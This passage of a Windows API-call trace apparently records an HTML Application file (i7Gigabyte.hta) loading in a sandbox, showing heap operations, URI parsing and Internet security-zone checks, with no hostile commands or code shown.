[0080.194] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14b868 | out: hHeap=0x110000) returned 1
[0080.194] GetProcessHeap () returned 0x110000
[0080.194] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14f2f8 | out: hHeap=0x110000) returned 1
[0080.195] GetProcessHeap () returned 0x110000
[0080.195] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13b948 | out: hHeap=0x110000) returned 1
[0080.195] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x133998
[0080.195] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x1248a0
[0080.195] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x1339b8
[0080.195] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x1241e8
[0080.196] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x60) returned 0x14b868
[0080.196] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x24) returned 0x12d168
[0080.196] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1c) returned 0x1449e0
[0080.197] GetAcceptLanguagesW () returned 0x0
[0080.197] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x150380
[0080.197] GetClassNameW (in: hWnd=0x20314, lpClassName=0x39fb54, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0080.197] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0080.197] GetParent (hWnd=0x20314) returned 0x20312
[0080.197] GetClassNameW (in: hWnd=0x20312, lpClassName=0x39fb54, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0080.197] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0080.197] GetParent (hWnd=0x20312) returned 0x0
[0080.197] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x14) returned 0x1339d8
[0080.197] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x12d198
[0080.197] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1339d8 | out: hHeap=0x110000) returned 1
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14ddc0
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xe) returned 0x1503c8
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x94) returned 0x1508b8
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x14) returned 0x1339d8
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x12) returned 0x1339f8
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x14) returned 0x133a18
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xe) returned 0x1503e0
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x10) returned 0x1503f8
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xe) returned 0x150410
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x10) returned 0x150428
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1c) returned 0x144a08
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1a) returned 0x144a30
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1a) returned 0x144a58
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x133a38
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x133a58
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x133a78
[0080.198] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x133a98
[0080.199] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x10) returned 0x150440
[0080.216] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xc) returned 0x150470
[0080.216] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x10) returned 0x150488
[0080.216] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x133ab8
[0080.216] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xe) returned 0x1504a0
[0080.216] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xa) returned 0x1504b8
[0080.216] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x26) returned 0x12d1c8
[0080.216] GetProcessHeap () returned 0x110000
[0080.217] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x144a80 | out: hHeap=0x110000) returned 1
[0080.217] GetProcessHeap () returned 0x110000
[0080.217] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x144aa8 | out: hHeap=0x110000) returned 1
[0080.217] GetProcessHeap () returned 0x110000
[0080.217] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x144ad0 | out: hHeap=0x110000) returned 1
[0080.217] GetProcessHeap () returned 0x110000
[0080.217] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1248b8 | out: hHeap=0x110000) returned 1
[0080.217] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x150440 | out: hHeap=0x110000) returned 1
[0080.217] IMoniker:GetDisplayName (in: This=0x13a4d0, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x39fb18 | out: ppszDisplayName=0x39fb18*="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0x0
[0080.217] IUnknown:QueryInterface (in: This=0x13a4d0, riid=0x739a72f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x39faf0 | out: ppvObject=0x39faf0*=0x13a4dc) returned 0x0
[0080.218] IUriContainer:GetIUri (in: This=0x13a4dc, ppIUri=0x39fb20 | out: ppIUri=0x39fb20*=0x13be24) returned 0x0
[0080.218] IUnknown:Release (This=0x13a4dc) returned 0x1
[0080.218] IUnknown:AddRef (This=0x13a4d0) returned 0x2
[0080.218] IUnknown:AddRef (This=0x13be24) returned 0x5
[0080.218] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.218] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.218] IMoniker:GetDisplayName (in: This=0x13a4d0, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x39f9f8 | out: ppszDisplayName=0x39f9f8*="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0x0
[0080.218] UrlGetLocationW (psz1="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0x0
[0080.219] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppmk=0x39f9c4*=0x0, dwFlags=0x1 | out: ppmk=0x39f9c4*=0x14f2f8) returned 0x0
[0080.219] CreateUri (in: pwzURI="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x39f9bc | out: ppURI=0x39f9bc*=0x13c184) returned 0x0
[0080.219] IUri:GetScheme (in: This=0x13c184, pdwScheme=0x39f954 | out: pdwScheme=0x39f954*=0x9) returned 0x0
[0080.219] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1
[0080.220] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.220] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x1c) returned 0x144ad0
[0080.221] IUnknown:AddRef (This=0x13c184) returned 0x5
[0080.221] IUri:GetAbsoluteUri (in: This=0x13c184, pbstrAbsoluteUri=0x144ad0 | out: pbstrAbsoluteUri=0x144ad0*="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0x0
[0080.221] IUnknown:Release (This=0x13c184) returned 0x4
[0080.221] IUnknown:AddRef (This=0x14f2f8) returned 0x2
[0080.221] IUnknown:Release (This=0x14f2f8) returned 0x1
[0080.221] IUnknown:AddRef (This=0x13a4d0) returned 0x3
[0080.221] IUnknown:Release (This=0x14f2f8) returned 0x0
[0080.221] IUnknown:AddRef (This=0x13a4d0) returned 0x4
[0080.221] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39f7c4 | out: ppvObject=0x39f7c4*=0x13be24) returned 0x0
[0080.221] IUnknown:Release (This=0x13be24) returned 0x5
[0080.221] IUnknown:AddRef (This=0x13be24) returned 0x6
[0080.221] IUnknown:QueryInterface (in: This=0x13a4d0, riid=0x739a72f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x39f798 | out: ppvObject=0x39f798*=0x13a4dc) returned 0x0
[0080.221] IUriContainer:GetIUri (in: This=0x13a4dc, ppIUri=0x39f7ec | out: ppIUri=0x39f7ec*=0x13be24) returned 0x0
[0080.221] IUnknown:Release (This=0x13a4dc) returned 0x4
[0080.222] IUnknown:AddRef (This=0x13a4d0) returned 0x5
[0080.222] IUnknown:Release (This=0x13a4d0) returned 0x4
[0080.222] IUnknown:AddRef (This=0x13be24) returned 0x8
[0080.222] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39f7c4 | out: ppvObject=0x39f7c4*=0x13be24) returned 0x0
[0080.222] IUnknown:Release (This=0x13be24) returned 0x8
[0080.222] IUnknown:AddRef (This=0x13be24) returned 0x9
[0080.222] IUri:GetScheme (in: This=0x13be24, pdwScheme=0x39f7bc | out: pdwScheme=0x39f7bc*=0x9) returned 0x0
[0080.222] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xc8) returned 0x150cf8
[0080.222] GetCurrentProcessId () returned 0xe80
[0080.222] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39f7c4 | out: ppvObject=0x39f7c4*=0x13be24) returned 0x0
[0080.222] IUnknown:Release (This=0x13be24) returned 0x9
[0080.222] IUnknown:AddRef (This=0x13be24) returned 0xa
[0080.222] IUri:GetScheme (in: This=0x13be24, pdwScheme=0x39f794 | out: pdwScheme=0x39f794*=0x9) returned 0x0
[0080.222] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39f748 | out: ppvObject=0x39f748*=0x13be24) returned 0x0
[0080.223] IUnknown:Release (This=0x13be24) returned 0xa
[0080.223] IUnknown:AddRef (This=0x13be24) returned 0xb
[0080.223] IUnknown:Release (This=0x13be24) returned 0xa
[0080.223] IUri:GetAbsoluteUri (in: This=0x13be24, pbstrAbsoluteUri=0x39f7c4 | out: pbstrAbsoluteUri=0x39f7c4*="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0x0
[0080.223] GetProcAddress (hModule=0x757f0000, lpProcName=0x7) returned 0x757f4680
[0080.224] SysStringLen (param_1="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0x33
[0080.224] CreateUri (in: pwzURI="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x39f7e0 | out: ppURI=0x39f7e0*=0x13c334) returned 0x0
[0080.224] IUnknown:Release (This=0x13be24) returned 0x9
[0080.224] IUri:GetScheme (in: This=0x13c334, pdwScheme=0x39f774 | out: pdwScheme=0x39f774*=0x9) returned 0x0
[0080.225] IUri:IsEqual (in: This=0x13c184, pUri=0x13c334, pfEqual=0x39f7bc | out: pfEqual=0x39f7bc*=1) returned 0x0
[0080.225] IUnknown:AddRef (This=0x13c184) returned 0x3
[0080.225] IUri:GetPropertyDWORD (in: This=0x13c184, uriProp=0x11, pdwProperty=0x39f554, dwFlags=0x0 | out: pdwProperty=0x39f554*=0x9) returned 0x0
[0080.225] IUnknown:Release (This=0x13c184) returned 0x2
[0080.225] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x6c) returned 0x151fb8
[0080.225] IInternetSecurityManager:GetSecurityId (in: This=0x143a40, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pbSecurityId=0x39f5b8, pcbSecurityId=0x39f5b4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x39f5b8*=0x66, pcbSecurityId=0x39f5b4*=0x9) returned 0x0
[0080.225] IInternetSecurityManager:GetSecurityId (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pbSecurityId=0x39f5b8, pcbSecurityId=0x39f5b4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x39f5b8*=0x0, pcbSecurityId=0x39f5b4*=0x200) returned 0x800c0011
[0080.316] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x151fb8 | out: hHeap=0x110000) returned 1
[0080.316] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13e0e8 | out: hHeap=0x110000) returned 1
[0080.316] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x9) returned 0x13e0e8
[0080.316] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13e148 | out: hHeap=0x110000) returned 1
[0080.316] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x9) returned 0x13e148
[0080.316] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f770 | out: ppu=0x39f770) returned 0x0
[0080.316] GetDC (hWnd=0x0) returned 0x2a010b9a
[0080.316] CreateCompatibleBitmap (hdc=0x2a010b9a, cx=1, cy=1) returned 0x1c0506de
[0080.316] GetDIBits (in: hdc=0x2a010b9a, hbm=0x1c0506de, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x39f340, usage=0x0 | out: lpvBits=0x0, lpbmi=0x39f340) returned 1
[0080.316] GetDIBits (in: hdc=0x2a010b9a, hbm=0x1c0506de, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x39f340, usage=0x0 | out: lpvBits=0x0, lpbmi=0x39f340) returned 1
[0080.316] DeleteObject (ho=0x1c0506de) returned 1
[0080.316] GetSysColor (nIndex=0) returned 0xc8c8c8
[0080.316] GetSysColor (nIndex=1) returned 0x0
[0080.316] GetSysColor (nIndex=2) returned 0xd1b499
[0080.317] GetSysColor (nIndex=3) returned 0xdbcdbf
[0080.317] GetSysColor (nIndex=4) returned 0xf0f0f0
[0080.317] GetSysColor (nIndex=5) returned 0xffffff
[0080.317] GetSysColor (nIndex=6) returned 0x646464
[0080.317] GetSysColor (nIndex=7) returned 0x0
[0080.317] GetSysColor (nIndex=8) returned 0x0
[0080.317] GetSysColor (nIndex=9) returned 0x0
[0080.317] GetSysColor (nIndex=10) returned 0xb4b4b4
[0080.317] GetSysColor (nIndex=11) returned 0xfcf7f4
[0080.317] GetSysColor (nIndex=12) returned 0xababab
[0080.317] GetSysColor (nIndex=13) returned 0xff9933
[0080.317] GetSysColor (nIndex=14) returned 0xffffff
[0080.317] GetSysColor (nIndex=15) returned 0xf0f0f0
[0080.317] GetSysColor (nIndex=16) returned 0xa0a0a0
[0080.317] GetSysColor (nIndex=17) returned 0x6d6d6d
[0080.317] GetSysColor (nIndex=18) returned 0x0
[0080.317] GetSysColor (nIndex=19) returned 0x544e43
[0080.317] GetSysColor (nIndex=20) returned 0xffffff
[0080.317] GetSysColor (nIndex=21) returned 0x696969
[0080.317] GetSysColor (nIndex=22) returned 0xe3e3e3
[0080.317] GetSysColor (nIndex=23) returned 0x0
[0080.317] GetSysColor (nIndex=24) returned 0xe1ffff
[0080.317] GetSysColor (nIndex=25) returned 0x0
[0080.318] GetSysColor (nIndex=26) returned 0xcc6600
[0080.318] GetSysColor (nIndex=27) returned 0xead1b9
[0080.318] GetSysColor (nIndex=28) returned 0xf2e4d7
[0080.318] GetSysColor (nIndex=29) returned 0xff9933
[0080.318] GetSysColor (nIndex=30) returned 0xf0f0f0
[0080.318] GetSysColor (nIndex=31) returned 0x0
[0080.318] GetSysColor (nIndex=32) returned 0x0
[0080.318] GetSysColor (nIndex=33) returned 0x0
[0080.318] GetSysColor (nIndex=34) returned 0x0
[0080.318] GetSysColor (nIndex=35) returned 0x0
[0080.318] GetSysColor (nIndex=36) returned 0x0
[0080.318] GetSysColor (nIndex=37) returned 0x0
[0080.318] GetSysColor (nIndex=38) returned 0x0
[0080.318] GetSysColor (nIndex=39) returned 0x0
[0080.318] GetSysColor (nIndex=40) returned 0x0
[0080.318] GetSysColor (nIndex=41) returned 0x0
[0080.318] GetSysColor (nIndex=42) returned 0x0
[0080.318] GetSysColor (nIndex=43) returned 0x0
[0080.318] GetSysColor (nIndex=44) returned 0x0
[0080.318] GetSysColor (nIndex=45) returned 0x0
[0080.318] GetSysColor (nIndex=46) returned 0x0
[0080.318] GetSysColor (nIndex=47) returned 0x0
[0080.318] GetSysColor (nIndex=48) returned 0x0
[0080.318] GetSysColor (nIndex=49) returned 0x0
[0080.318] GetSysColor (nIndex=50) returned 0x0
[0080.318] GetSysColor (nIndex=51) returned 0x0
[0080.318] GetSysColor (nIndex=52) returned 0x0
[0080.318] GetSysColor (nIndex=53) returned 0x0
[0080.318] GetSysColor (nIndex=54) returned 0x0
[0080.318] GetSysColor (nIndex=55) returned 0x0
[0080.318] GetSysColor (nIndex=56) returned 0x0
[0080.318] GetSysColor (nIndex=57) returned 0x0
[0080.318] GetSysColor (nIndex=58) returned 0x0
[0080.318] GetSysColor (nIndex=59) returned 0x0
[0080.318] GetSysColor (nIndex=60) returned 0x0
[0080.318] GetSysColor (nIndex=61) returned 0x0
[0080.318] GetSysColor (nIndex=62) returned 0x0
[0080.319] GetSysColor (nIndex=63) returned 0x0
[0080.319] GetDeviceCaps (hdc=0x2a010b9a, index=38) returned 32409
[0080.319] ReleaseDC (hWnd=0x0, hDC=0x2a010b9a) returned 1
[0080.319] GetCurrentThreadId () returned 0xe84
[0080.319] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x150638
[0080.319] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x50) returned 0x14de18
[0080.320] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d8d0
[0080.320] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x1525d8
[0080.320] GetProcAddress (hModule=0x757f0000, lpProcName=0x8) returned 0x757f3ed5
[0080.320] GetCurrentThreadId () returned 0xe84
[0080.321] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d8d0 | out: hHeap=0x110000) returned 1
[0080.321] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x6c) returned 0x151fb8
[0080.321] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f760 | out: ppu=0x39f760) returned 0x0
[0080.321] CreateUri (in: pwzURI="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x39f744 | out: ppURI=0x39f744*=0x13c184) returned 0x0
[0080.321] IUnknown:AddRef (This=0x13c184) returned 0x5
[0080.321] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f6e4, dwFlags=0x0 | out: pdwZone=0x39f6e4*=0xffffffff) returned 0x800c0011
[0080.323] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0080.323] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0080.323] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0080.323] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x2700, pPolicy=0x39f6e8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x39f6e8*=0x0) returned 0x0
[0080.323] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0080.323] IUnknown:Release (This=0x13c184) returned 0x4
[0080.323] IUnknown:Release (This=0x13c184) returned 0x3
[0080.323] IUnknown:AddRef (This=0x13c184) returned 0x4
[0080.323] IUri:GetPropertyDWORD (in: This=0x13c184, uriProp=0x11, pdwProperty=0x39f51c, dwFlags=0x0 | out: pdwProperty=0x39f51c*=0x9) returned 0x0
[0080.323] IUnknown:Release (This=0x13c184) returned 0x3
[0080.324] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x6c) returned 0x152e40
[0080.324] IInternetSecurityManager:GetSecurityId (in: This=0x143a40, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pbSecurityId=0x39f578, pcbSecurityId=0x39f574*=0x200, dwReserved=0x0 | out: pbSecurityId=0x39f578*=0x66, pcbSecurityId=0x39f574*=0x9) returned 0x0
[0080.324] IInternetSecurityManager:GetSecurityId (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pbSecurityId=0x39f578, pcbSecurityId=0x39f574*=0x200, dwReserved=0x0 | out: pbSecurityId=0x39f578*=0x0, pcbSecurityId=0x39f574*=0x200) returned 0x800c0011
[0080.324] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152e40 | out: hHeap=0x110000) returned 1
[0080.324] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.324] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x9) returned 0x150620
[0080.324] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x39f79c, dwReserved=0x0 | out: ppIInternetSession=0x39f79c*=0x1467f8) returned 0x0
[0080.324] IInternetSession:RegisterNameSpace (This=0x1467f8, pCF=0x73da8c50, rclsid=0x739a9790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0080.325] IUnknown:AddRef (This=0x73da8c50) returned 0x1
[0080.325] IInternetSession:RegisterNameSpace (This=0x1467f8, pCF=0x73da8c70, rclsid=0x739a9780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0080.325] IUnknown:AddRef (This=0x73da8c70) returned 0x1
[0080.325] StrCmpICW (pszStr1="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -12
[0080.325] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39f70c | out: ppvObject=0x39f70c*=0x13be24) returned 0x0
[0080.326] IUnknown:Release (This=0x13be24) returned 0x9
[0080.326] IUnknown:AddRef (This=0x13be24) returned 0xa
[0080.326] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x12c) returned 0x152e40
[0080.326] IUnknown:AddRef (This=0x13be24) returned 0xb
[0080.326] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39f6d0 | out: ppvObject=0x39f6d0*=0x13be24) returned 0x0
[0080.326] IUnknown:Release (This=0x13be24) returned 0xb
[0080.326] IUnknown:AddRef (This=0x13be24) returned 0xc
[0080.326] IUnknown:Release (This=0x13be24) returned 0xb
[0080.326] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x3c) returned 0x1242c0
[0080.326] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb4) returned 0x152f78
[0080.326] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x30) returned 0x12d8d0
[0080.327] IUri:GetScheme (in: This=0x13be24, pdwScheme=0x39f754 | out: pdwScheme=0x39f754*=0x9) returned 0x0
[0080.327] IUri:IsEqual (in: This=0x13c184, pUri=0x13be24, pfEqual=0x39f79c | out: pfEqual=0x39f79c*=1) returned 0x0
[0080.327] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.327] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14de70
[0080.327] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x133b78
[0080.327] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x60) returned 0x150f60
[0080.327] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x30) returned 0x12d908
[0080.327] PostMessageW (hWnd=0x20320, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0080.327] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x12c) returned 0x153038
[0080.327] IUnknown:AddRef (This=0x13be24) returned 0xc
[0080.327] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39f6f0 | out: ppvObject=0x39f6f0*=0x13be24) returned 0x0
[0080.327] IUnknown:Release (This=0x13be24) returned 0xc
[0080.327] IUnknown:AddRef (This=0x13be24) returned 0xd
[0080.327] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14dec8
[0080.327] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x68) returned 0x153170
[0080.327] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x108) returned 0x1531e0
[0080.327] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x150668
[0080.328] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xcc) returned 0x13c838
[0080.328] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x1506b0
[0080.328] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d940
[0080.328] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x1b0) returned 0x1532f0
[0080.328] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39f3f4 | out: ppvObject=0x39f3f4*=0x13be24) returned 0x0
[0080.328] IUnknown:Release (This=0x13be24) returned 0xd
[0080.328] IUnknown:AddRef (This=0x13be24) returned 0xe
[0080.328] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0080.328] IUnknown:AddRef (This=0x13be24) returned 0xf
[0080.328] IUnknown:AddRef (This=0x13be24) returned 0x10
[0080.328] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39f3e8 | out: ppvObject=0x39f3e8*=0x13be24) returned 0x0
[0080.328] IUnknown:Release (This=0x13be24) returned 0x10
[0080.328] IUnknown:AddRef (This=0x13be24) returned 0x11
